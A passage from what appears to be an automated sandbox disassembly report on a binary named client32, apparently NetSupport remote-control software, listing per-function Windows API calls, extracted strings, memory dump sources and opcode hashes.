                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1101F30E
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                              • String ID: $0$UndoOwnerDraw
                                                                              • API String ID: 4094458939-790594647
                                                                              • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                              • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                              • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                              • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                              Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1106F737
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeavewsprintf
                                                                              • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                              • API String ID: 3005300677-3496508882
                                                                              • Opcode ID: 528d664af790432cc8ca1395220602a174b3715dc91bad2e9284cb29b95c4820
                                                                              • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                              • Opcode Fuzzy Hash: 528d664af790432cc8ca1395220602a174b3715dc91bad2e9284cb29b95c4820
                                                                              • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                              Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,EE49F673,00000000,?,00000000), ref: 110613A4
                                                                              • _malloc.LIBCMT ref: 110613EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,EE49F673,00000000), ref: 1106142B
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                              • _free.LIBCMT ref: 110614A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                              • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                              • API String ID: 999355418-161875503
                                                                              • Opcode ID: 1fd6cffb0b6506106fbd2de026ba492dd64e6340ee49c1c0b4f88686c2a5e216
                                                                              • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                              • Opcode Fuzzy Hash: 1fd6cffb0b6506106fbd2de026ba492dd64e6340ee49c1c0b4f88686c2a5e216
                                                                              • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                              Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 1104147B
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040414,?,00000002,00002710,?), ref: 11041670
                                                                              • _free.LIBCMT ref: 11041677
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                              • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 1897251511-2352888828
                                                                              • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                              • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                              • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                              • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                              Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110513F9
                                                                              • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle__wcstoi64_memset
                                                                              • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                              • API String ID: 510078033-311296318
                                                                              • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                              • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                              Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                              • API String ID: 536389180-1339850372
                                                                              • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                              • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                              Function 111076E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                              • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                              • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                              • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 3891031082-3311166593
                                                                              • Opcode ID: d169f7d3ec2389e32f8db3f945f37a094bda190619949e4597d4702fbcf04816
                                                                              • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                              • Opcode Fuzzy Hash: d169f7d3ec2389e32f8db3f945f37a094bda190619949e4597d4702fbcf04816
                                                                              • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                              Function 110DD6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                              • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                              • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                              • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                              • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,EE49F673,?,00000000,00000001), ref: 110D7F8C
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              Strings
                                                                              • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                              • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                              • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                              • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                              • API String ID: 477284662-4139260718
                                                                              • Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                              • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                              • Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                              • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                              Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                              • SendMessageA.USER32(00000000,0000004A,00040414,?), ref: 1103D313
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                              • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                              • String ID: CLTCONN.CPP$NSMW16Class
                                                                              • API String ID: 4104200039-3790257117
                                                                              • Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                              • Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                              Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                              • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                              • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                              • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
